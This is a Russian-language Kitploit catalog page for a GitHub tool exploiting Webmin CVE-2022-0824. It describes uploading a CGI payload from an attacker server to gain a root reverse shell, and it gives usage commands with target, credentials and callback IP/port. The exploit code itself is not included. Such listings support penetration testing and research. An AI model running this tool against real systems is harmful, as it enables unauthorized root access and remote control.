Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/faisalfs10x/webmin-cve-2022-0824-revshell
Повышение привилегийГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на Проникновение
GitHubfaisalfs10x/webmin-cve-2022-0824-revshell

Webmin-CVE-2022-0824-revshell

Пост-аутентификационный эксплойт обратной оболочки для Webmin <=1.984, использующий CVE-2022-0824 повышение привилегий в File Manager. Загружает и выполняет CGI-полезную нагрузку для получения root-доступа.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1113324 лет назадПроверено Kitploit

Webmin-CVE-2022-0824-revshell

Описание уязвимости

Webmin 1.984 и ниже — эксплуатация привилегий менеджера файлов (CVE-2022-0824 и CVE-2022-0829)
Менее привилегированные пользователи Webmin, у которых не настроены ограничения модуля File Manager, могут получать доступ к файлам с привилегиями root при использовании темы Authentic по умолчанию. Все системы с дополнительными недоверенными пользователями Webmin должны быть немедленно обновлены. Обратите внимание, что системы Virtualmin не затронуты этой ошибкой из-за способа настройки пользователей Webmin, владеющих доменами.
Источник: https://www.webmin.com/security.html

Описание эксплойта

Этот эксплойт использует уязвимость неправильного контроля доступа (Improper Access Control) после аутентификации в File Manager. Эксплойт может быть выполнен любым менее привилегированным аутентифицированным атакующим. Он загружает файл .cgi удалённо с сервера, контролируемого атакующим, и изменяет его разрешения, делая файл исполняемым для всех пользователей. После этого выполняется файл .cgi для установления обратного соединения с сервером атакующего с привилегиями root.

Ссылка: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/

Использование

root@kitploit:~
$~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT]
$~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444

$~  python3 Webmin-revshell.py -h                                                                                                                                    
    usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V]

    Webmin CVE-2022-0824 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -t TARGET, --target TARGET
                            Target full URL, https://www.webmin.local:10000
      -c CREDENTIAL, --credential CREDENTIAL
                            Format, user:user123
      -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER
                            Http server for serving payload, ex 192.168.5.120:8080
      -L CALLBACK_IP, --callback_ip CALLBACK_IP
                            Callback IP to receive revshell
      -P CALLBACK_PORT, --callback_port CALLBACK_PORT
                            Callback port to receive revshell
      -V, --version         show program's version number and exit

PoC

root@kitploit:~
целевой хост: https://192.168.5.118:10000
атакующий хост: 192.168.5.120

https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4

Протестировано на

root@kitploit:~
- Webmin 1.984
- Ubuntu 18.04
- Kali 2021.3

Отказ от ответственности:

root@kitploit:~
Скрипт предназначен только для анализа безопасности и исследований, поэтому я не несу ответственности за его использование в незаконных целях.
Скачать инструмент